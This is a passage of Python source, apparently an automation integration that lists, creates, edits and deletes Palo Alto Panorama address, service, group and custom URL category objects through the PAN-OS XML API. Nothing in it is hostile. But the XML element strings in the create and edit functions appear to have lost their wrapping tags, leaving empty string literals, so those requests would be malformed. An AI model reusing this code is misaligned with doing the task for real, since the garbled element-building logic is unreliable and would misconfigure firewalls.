entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': addresses_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Addresses:', addresses_output,\n ['Name', 'IP_Netmask', 'IP_Range', 'FQDN', 'Tags'], removeNull=True),\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": addresses_output\n }\n })\n\n\ndef prettify_address(address: Dict) -> Dict:\n pretty_address = {'Name': address['@name']}\n if DEVICE_GROUP:\n pretty_address['DeviceGroup'] = DEVICE_GROUP\n if 'description' in address:\n pretty_address['Description'] = address['description']\n\n if 'ip-netmask' in address:\n pretty_address['IP_Netmask'] = address['ip-netmask']\n\n if 'ip-range' in address:\n pretty_address['IP_Range'] = address['ip-range']\n\n if 'fqdn' in address:\n pretty_address['FQDN'] = address['fqdn']\n\n if 'tag' in address and 'member' in address['tag']:\n pretty_address['Tags'] = address['tag']['member']\n\n return pretty_address\n\n\n@logger\ndef panorama_get_address(address_name: str) -> Dict:\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': f'{XPATH_OBJECTS}address/entry[@name=\\'{address_name}\\']',\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_address_command(args: dict):\n \"\"\"\n Get an address\n \"\"\"\n address_name = args.get('name')\n\n address = panorama_get_address(address_name)\n address_output = prettify_address(address)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address:', address_output,\n ['Name', 'IP_Netmask', 'IP_Range', 'FQDN', 'Tags'], removeNull=True),\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": address_output\n }\n })\n\n\n@logger\ndef panorama_create_address(address_name: str, fqdn: str = None, ip_netmask: str = None, ip_range: str = None,\n description: str = None, tags: list = None):\n params = {'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address/entry[@name='\" + address_name + \"']\",\n 'key': API_KEY,\n 'element': (add_argument(fqdn, 'fqdn', False)\n + add_argument(ip_netmask, 'ip-netmask', False)\n + add_argument(ip_range, 'ip-range', False)\n + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True))\n }\n\n http_request(\n URL,\n 'POST',\n body=params,\n )\n\n\ndef panorama_create_address_command(args: dict):\n \"\"\"\n Create an address object\n \"\"\"\n address_name = args['name']\n description = args.get('description')\n tags = argToList(args['tag']) if 'tag' in args else None\n\n fqdn = args.get('fqdn')\n ip_netmask = args.get('ip_netmask')\n ip_range = args.get('ip_range')\n\n if not fqdn and not ip_netmask and not ip_range:\n raise Exception('Please specify exactly one of the following: fqdn, ip_netmask, ip_range.')\n\n if (fqdn and ip_netmask) or (fqdn and ip_range) or (ip_netmask and ip_range):\n raise Exception('Please specify exactly one of the following: fqdn, ip_netmask, ip_range.')\n\n address = panorama_create_address(address_name, fqdn, ip_netmask, ip_range, description, tags)\n\n address_output = {'Name': address_name}\n if DEVICE_GROUP:\n address_output['DeviceGroup'] = DEVICE_GROUP\n if fqdn:\n address_output['FQDN'] = fqdn\n if ip_netmask:\n address_output['IP_Netmask'] = ip_netmask\n if ip_range:\n address_output['IP_Range'] = ip_range\n if description:\n address_output['Description'] = description\n if tags:\n address_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address was created successfully.',\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": address_output\n }\n })\n\n\n@logger\ndef panorama_delete_address(address_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address/entry[@name='\" + address_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_address_command(args: dict):\n \"\"\"\n Delete an address\n \"\"\"\n address_name = args.get('name')\n\n address = panorama_delete_address(address_name)\n address_output = {'Name': address_name}\n if DEVICE_GROUP:\n address_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address was deleted successfully.',\n 'EntryContext': {\n \"Panorama.Addresses(val.Name == obj.Name)\": address_output\n }\n })\n\n\n''' Address Group Commands '''\n\n\ndef prettify_address_groups_arr(address_groups_arr: list) -> List:\n if not isinstance(address_groups_arr, list):\n return prettify_address_group(address_groups_arr)\n pretty_address_groups_arr = []\n for address_group in address_groups_arr:\n pretty_address_group = {\n 'Name': address_group['@name'],\n 'Type': 'static' if 'static' in address_group else 'dynamic'\n }\n if DEVICE_GROUP:\n pretty_address_group['DeviceGroup'] = DEVICE_GROUP\n if 'description' in address_group:\n pretty_address_group['Description'] = address_group['description']\n if 'tag' in address_group and 'member' in address_group['tag']:\n pretty_address_group['Tags'] = address_group['tag']['member']\n\n if pretty_address_group['Type'] == 'static':\n # static address groups can have empty lists\n if address_group['static']:\n pretty_address_group['Addresses'] = address_group['static']['member']\n else:\n pretty_address_group['Match'] = address_group['dynamic']['filter']\n\n pretty_address_groups_arr.append(pretty_address_group)\n\n return pretty_address_groups_arr\n\n\n@logger\ndef panorama_list_address_groups(tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params['xpath'] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_address_groups_command(args: dict):\n \"\"\"\n Get all address groups\n \"\"\"\n address_groups_arr = panorama_list_address_groups(args.get('tag'))\n address_groups_output = prettify_address_groups_arr(address_groups_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address_groups_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address groups:', address_groups_output,\n ['Name', 'Type', 'Addresses', 'Match', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_groups_output\n }\n })\n\n\ndef prettify_address_group(address_group: Dict) -> Dict:\n pretty_address_group = {\n 'Name': address_group['@name'],\n 'Type': 'static' if 'static' in address_group else 'dynamic'\n }\n if DEVICE_GROUP:\n pretty_address_group['DeviceGroup'] = DEVICE_GROUP\n\n if 'description' in address_group:\n pretty_address_group['Description'] = address_group['description']\n if 'tag' in address_group and 'member' in address_group['tag']:\n pretty_address_group['Tags'] = address_group['tag']['member']\n\n if pretty_address_group['Type'] == 'static':\n pretty_address_group['Addresses'] = address_group['static']['member']\n else:\n pretty_address_group['Match'] = address_group['dynamic']['filter']\n\n return pretty_address_group\n\n\n@logger\ndef panorama_get_address_group(address_group_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_address_group_command(args: dict):\n \"\"\"\n Get an address group\n \"\"\"\n address_group_name = args.get('name')\n\n result = panorama_get_address_group(address_group_name)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address group:', prettify_address_group(result),\n ['Name', 'Type', 'Addresses', 'Match', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": prettify_address_group(result)\n }\n })\n\n\n@logger\ndef panorama_create_static_address_group(address_group_name: str, addresses: list,\n description: str = None, tags: list = None):\n params = {'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'key': API_KEY,\n 'element': (\n \"\" + add_argument_list(addresses, 'member', True)\n + \"\" + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True)\n )}\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_dynamic_address_group(address_group_name: str, match: Optional[str],\n description: str = None, tags: list = None):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'element': \"\" + add_argument(match, 'filter', False)\n + \"\" + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True),\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_address_group_command(args: dict):\n \"\"\"\n Create an address group\n \"\"\"\n address_group_name = args['name']\n type_ = args['type']\n description = args.get('description')\n tags = argToList(args['tags']) if 'tags' in args else None\n match = args.get('match')\n addresses = argToList(args['addresses']) if 'addresses' in args else None\n if match and addresses:\n raise Exception('Please specify only one of the following: addresses, match.')\n if type_ == 'static':\n if not addresses:\n raise Exception('Please specify addresses in order to create a static address group.')\n if type_ == 'dynamic':\n if not match:\n raise Exception('Please specify a match in order to create a dynamic address group.')\n\n if type_ == 'static':\n result = panorama_create_static_address_group(address_group_name, addresses, description, tags)\n else:\n result = panorama_create_dynamic_address_group(address_group_name, match, description, tags)\n\n address_group_output = {\n 'Name': address_group_name,\n 'Type': type_\n }\n if DEVICE_GROUP:\n address_group_output['DeviceGroup'] = DEVICE_GROUP\n if match:\n address_group_output['Match'] = match\n if addresses:\n address_group_output['Addresses'] = addresses\n if description:\n address_group_output['Description'] = description\n if tags:\n address_group_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address group was created successfully.',\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_group_output\n }\n })\n\n\n@logger\ndef panorama_delete_address_group(address_group_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_address_group_command(address_group_name: str):\n \"\"\"\n Delete an address group\n \"\"\"\n\n address_group = panorama_delete_address_group(address_group_name)\n address_group_output = {'Name': address_group_name}\n if DEVICE_GROUP:\n address_group_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address_group,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address group was deleted successfully.',\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_group_output\n }\n })\n\n\ndef panorama_edit_address_group_command(args: dict):\n \"\"\"\n Edit an address group\n \"\"\"\n address_group_name = args['name']\n type_ = args['type']\n match = args.get('match')\n element_to_add = argToList(args['element_to_add']) if 'element_to_add' in args else None\n element_to_remove = argToList(\n args['element_to_remove']) if 'element_to_remove' in args else None\n\n if type_ == 'dynamic':\n if not match:\n raise Exception('To edit a Dynamic Address group, Please provide a match.')\n match_param = add_argument_open(match, 'filter', False)\n match_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/dynamic/filter\"\n\n if type_ == 'static':\n if (element_to_add and element_to_remove) or (not element_to_add and not element_to_remove):\n raise Exception('To edit a Static Address group,'\n 'Please specify exactly one of the following: element_to_add, element_to_remove.')\n address_group_prev = panorama_get_address_group(address_group_name)\n address_group_list: List[str] = []\n if 'static' in address_group_prev:\n if address_group_prev['static']:\n address_group_list = argToList(address_group_prev['static']['member'])\n if element_to_add:\n addresses = list(set(element_to_add + address_group_list))\n else:\n addresses = [item for item in address_group_list if item not in element_to_remove]\n addresses_param = add_argument_list(addresses, 'member', False)\n addresses_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/static\"\n\n description = args.get('description')\n tags = argToList(args['tags']) if 'tags' in args else None\n\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'key': API_KEY,\n 'xpath': '',\n 'element': ''\n }\n\n address_group_output = {'Name': address_group_name}\n\n if DEVICE_GROUP:\n address_group_output['DeviceGroup'] = DEVICE_GROUP\n\n if type_ == 'dynamic' and match:\n params['xpath'] = match_path\n params['element'] = match_param\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Match'] = match\n\n if type_ == 'static' and addresses:\n params['xpath'] = addresses_path\n params['element'] = \"\" + addresses_param + \"\"\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Addresses'] = addresses\n\n if description:\n description_param = add_argument_open(description, 'description', False)\n description_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/description\"\n params['xpath'] = description_path\n params['element'] = description_param\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Description'] = description\n\n if tags:\n tag_param = add_argument_list(tags, 'tag', True)\n tag_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/tag\"\n params['xpath'] = tag_path\n params['element'] = tag_param\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address Group was edited successfully.',\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_group_output\n }\n })\n\n\n''' Services Commands '''\n\n\ndef prettify_services_arr(services_arr: Union[dict, list]):\n if not isinstance(services_arr, list):\n return prettify_service(services_arr)\n\n pretty_services_arr = []\n for service in services_arr:\n pretty_service = {'Name': service['@name']}\n if DEVICE_GROUP:\n pretty_service['DeviceGroup'] = DEVICE_GROUP\n if 'description' in service:\n pretty_service['Description'] = service['description']\n if 'tag' in service and 'member' in service['tag']:\n pretty_service['Tags'] = service['tag']['member']\n\n protocol = ''\n if 'protocol' in service:\n if 'tcp' in service['protocol']:\n protocol = 'tcp'\n elif 'udp' in service['protocol']:\n protocol = 'udp'\n else:\n protocol = 'sctp'\n pretty_service['Protocol'] = protocol\n\n if 'port' in service['protocol'][protocol]:\n pretty_service['DestinationPort'] = service['protocol'][protocol]['port']\n if 'source-port' in service['protocol'][protocol]:\n pretty_service['SourcePort'] = service['protocol'][protocol]['source-port']\n\n pretty_services_arr.append(pretty_service)\n\n return pretty_services_arr\n\n\n@logger\ndef panorama_list_services(tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params['xpath'] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_services_command(tag: Optional[str]):\n \"\"\"\n Get all Services\n \"\"\"\n services_arr = panorama_list_services(tag)\n services_output = prettify_services_arr(services_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': services_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Services:', services_output,\n ['Name', 'Protocol', 'SourcePort', 'DestinationPort', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": services_output\n }\n })\n\n\ndef prettify_service(service: Dict):\n pretty_service = {\n 'Name': service['@name'],\n }\n if DEVICE_GROUP:\n pretty_service['DeviceGroup'] = DEVICE_GROUP\n if 'description' in service:\n pretty_service['Description'] = service['description']\n if 'tag' in service and 'member' in service['tag']:\n pretty_service['Tags'] = service['tag']['member']\n\n protocol = ''\n if 'protocol' in service:\n if 'tcp' in service['protocol']:\n protocol = 'tcp'\n elif 'udp' in service['protocol']:\n protocol = 'udp'\n else:\n protocol = 'sctp'\n pretty_service['Protocol'] = protocol\n\n if 'port' in service['protocol'][protocol]:\n pretty_service['DestinationPort'] = service['protocol'][protocol]['port']\n if 'source-port' in service['protocol'][protocol]:\n pretty_service['SourcePort'] = service['protocol'][protocol]['source-port']\n\n return pretty_service\n\n\n@logger\ndef panorama_get_service(service_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry[@name='\" + service_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_service_command(service_name: str):\n \"\"\"\n Get a service\n \"\"\"\n\n service = panorama_get_service(service_name)\n service_output = prettify_service(service)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address:', service_output,\n ['Name', 'Protocol', 'SourcePort', 'DestinationPort', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": service_output\n }\n })\n\n\n@logger\ndef panorama_create_service(service_name: str, protocol: str, destination_port: str,\n source_port: str = None, description: str = None, tags: list = None):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry[@name='\" + service_name + \"']\",\n 'key': API_KEY,\n 'element': '' + '<' + protocol + '>'\n + add_argument(destination_port, 'port', False)\n + add_argument(source_port, 'source-port', False)\n + '' + ''\n + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True)\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_service_command(args: dict):\n \"\"\"\n Create a service object\n \"\"\"\n service_name = args['name']\n protocol = args['protocol']\n destination_port = args['destination_port']\n source_port = args.get('source_port')\n description = args.get('description')\n tags = argToList(args['tags']) if 'tags' in args else None\n\n service = panorama_create_service(service_name, protocol, destination_port, source_port, description, tags)\n\n service_output = {\n 'Name': service_name,\n 'Protocol': protocol,\n 'DestinationPort': destination_port\n }\n if DEVICE_GROUP:\n service_output['DeviceGroup'] = DEVICE_GROUP\n if source_port:\n service_output['SourcePort'] = source_port\n if description:\n service_output['Description'] = description\n if tags:\n service_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service was created successfully.',\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": service_output\n }\n })\n\n\n@logger\ndef panorama_delete_service(service_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry[@name='\" + service_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_service_command(service_name: str):\n \"\"\"\n Delete a service\n \"\"\"\n\n service = panorama_delete_service(service_name)\n service_output = {'Name': service_name}\n if DEVICE_GROUP:\n service_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service was deleted successfully.',\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": service_output\n }\n })\n\n\n''' Service Group Commands '''\n\n\ndef prettify_service_groups_arr(service_groups_arr: list):\n if not isinstance(service_groups_arr, list):\n return prettify_service_group(service_groups_arr)\n\n pretty_service_groups_arr = []\n for service_group in service_groups_arr:\n pretty_service_group = {\n 'Name': service_group['@name'],\n 'Services': service_group['members']['member']\n }\n if DEVICE_GROUP:\n pretty_service_group['DeviceGroup'] = DEVICE_GROUP\n if 'tag' in service_group and 'member' in service_group['tag']:\n pretty_service_group['Tags'] = service_group['tag']['member']\n\n pretty_service_groups_arr.append(pretty_service_group)\n\n return pretty_service_groups_arr\n\n\n@logger\ndef panorama_list_service_groups(tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params[\"xpath\"] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_service_groups_command(tag: Optional[str]):\n \"\"\"\n Get all address groups\n \"\"\"\n service_groups_arr = panorama_list_service_groups(tag)\n service_groups_output = prettify_service_groups_arr(service_groups_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service_groups_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Service groups:', service_groups_output, ['Name', 'Services', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_groups_output\n }\n })\n\n\ndef prettify_service_group(service_group: dict):\n pretty_service_group = {\n 'Name': service_group['@name'],\n 'Services': service_group['members']['member']\n }\n if DEVICE_GROUP:\n pretty_service_group['DeviceGroup'] = DEVICE_GROUP\n if 'tag' in service_group and 'member' in service_group['tag']:\n pretty_service_group['Tags'] = service_group['tag']['member']\n\n return pretty_service_group\n\n\n@logger\ndef panorama_get_service_group(service_group_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_service_group_command(service_group_name: str):\n \"\"\"\n Get an address group\n \"\"\"\n\n result = panorama_get_service_group(service_group_name)\n pretty_service_group = prettify_service_group(result)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Service group:', pretty_service_group, ['Name', 'Services', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": pretty_service_group\n }\n })\n\n\ndef panorama_create_service_group(service_group_name: str, services: list, tags: list):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']\",\n 'element': '' + add_argument_list(services, 'member', True) + ''\n + add_argument_list(tags, 'tag', True),\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_service_group_command(args: dict):\n \"\"\"\n Create a service group\n \"\"\"\n service_group_name = args['name']\n services = argToList(args['services'])\n tags = argToList(args['tags']) if 'tags' in args else None\n\n result = panorama_create_service_group(service_group_name, services, tags)\n\n service_group_output = {\n 'Name': service_group_name,\n 'Services': services\n }\n if DEVICE_GROUP:\n service_group_output['DeviceGroup'] = DEVICE_GROUP\n if tags:\n service_group_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service group was created successfully.',\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_group_output\n }\n })\n\n\n@logger\ndef panorama_delete_service_group(service_group_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_service_group_command(service_group_name: str):\n \"\"\"\n Delete a service group\n \"\"\"\n\n service_group = panorama_delete_service_group(service_group_name)\n service_group_output = {'Name': service_group_name}\n if DEVICE_GROUP:\n service_group_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service_group,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service group was deleted successfully.',\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_group_output\n }\n })\n\n\n@logger\ndef panorama_edit_service_group(service_group_name: str, services: List[str], tag: List[str]):\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'xpath': '',\n 'element': '',\n 'key': API_KEY,\n }\n\n if services:\n services_xpath = XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']/members\"\n services_element = '' + add_argument_list(services, 'member', False) + ''\n params['xpath'] = services_xpath\n params['element'] = services_element\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n if tag:\n tag_xpath = XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']/tag\"\n tag_element = add_argument_list(tag, 'tag', True)\n params['xpath'] = tag_xpath\n params['element'] = tag_element\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_edit_service_group_command(args: dict):\n \"\"\"\n Edit a service group\n \"\"\"\n service_group_name = args['name']\n services_to_add = argToList(args['services_to_add']) if 'services_to_add' in args else None\n services_to_remove = argToList(\n args['services_to_remove']) if 'services_to_remove' in args else None\n tag = argToList(args['tag']) if 'tag' in args else None\n\n if not services_to_add and not services_to_remove and not tag:\n raise Exception('Specify at least one of the following arguments: services_to_add, services_to_remove, tag')\n\n if services_to_add and services_to_remove:\n raise Exception('Specify at most one of the following arguments: services_to_add, services_to_remove')\n\n services: List[str] = []\n if services_to_add or services_to_remove:\n service_group_prev = panorama_get_service_group(service_group_name)\n service_group_list = argToList(service_group_prev['members']['member'])\n if services_to_add:\n services = list(set(services_to_add + service_group_list))\n else:\n services = [item for item in service_group_list if item not in services_to_remove]\n\n if len(services) == 0:\n raise Exception('A Service group must have at least one service.')\n\n result = panorama_edit_service_group(service_group_name, services, tag)\n\n service_group_output = {'Name': service_group_name}\n if DEVICE_GROUP:\n service_group_output['DeviceGroup'] = DEVICE_GROUP\n if len(services) > 0:\n service_group_output['Services'] = services\n if tag:\n service_group_output['Tag'] = tag\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service group was edited successfully.',\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_group_output\n }\n })\n\n\n''' Custom URL Category Commands '''\n\n\ndef prettify_custom_url_category(custom_url_category: dict):\n pretty_custom_url_category = {\n 'Name': custom_url_category['@name'],\n }\n if DEVICE_GROUP:\n pretty_custom_url_category['DeviceGroup'] = DEVICE_GROUP\n\n if 'description' in custom_url_category:\n pretty_custom_url_category['Description'] = custom_url_category['description']\n\n # In PAN-OS 9.X changes to the default behavior were introduced regarding custom url categories.\n if 'type' in custom_url_category:\n pretty_custom_url_category['Type'] = custom_url_category['type']\n if pretty_custom_url_category['Type'] == 'Category Match':\n pretty_custom_url_category['Categories'] = custom_url_category['list']['member']\n else:\n pretty_custom_url_category['Sites'] = custom_url_category['list']['member']\n else:\n pretty_custom_url_category['Sites'] = custom_url_category['list']['member']\n\n return pretty_custom_url_category\n\n\n@logger\ndef panorama_get_custom_url_category(name: str):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_custom_url_category_command(name: str):\n \"\"\"\n Get a custom url category\n \"\"\"\n\n custom_url_category = panorama_get_custom_url_category(name)\n custom_url_category_output = prettify_custom_url_category(custom_url_category)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': custom_url_category,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Custom URL Category:', custom_url_category_output,\n ['Name', 'Type', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\n@logger\ndef panorama_create_custom_url_category(custom_url_category_name: str, type_: Any = None,\n sites: Optional[list] = None, categories: Optional[list] = None,\n description: str = None):\n # In PAN-OS 9.X changes to the default behavior were introduced regarding custom url categories.\n major_version = get_pan_os_major_version()\n element = add_argument(description, 'description', False)\n if major_version <= 8:\n if type_ or categories:\n raise Exception('The type and categories arguments are only relevant for PAN-OS 9.x versions.')\n element += add_argument_list(sites, 'list', True)\n else: # major is 9.x\n if not type_:\n raise Exception('The type argument is mandatory for PAN-OS 9.x versions.')\n if (not sites and not categories) or (sites and categories):\n raise Exception('Exactly one of the sites and categories arguments should be defined.')\n if (type_ == 'URL List' and categories) or (type_ == 'Category Match' and sites):\n raise Exception('URL List type is only for sites, Category Match is only for categories.')\n\n if type_ == 'URL List':\n element += add_argument_list(sites, 'list', True)\n else:\n element += add_argument_list(categories, 'list', True)\n element += add_argument(type_, 'type', False)\n\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + custom_url_category_name + \"']\",\n 'element': element,\n 'key': API_KEY\n }\n result = http_request(\n 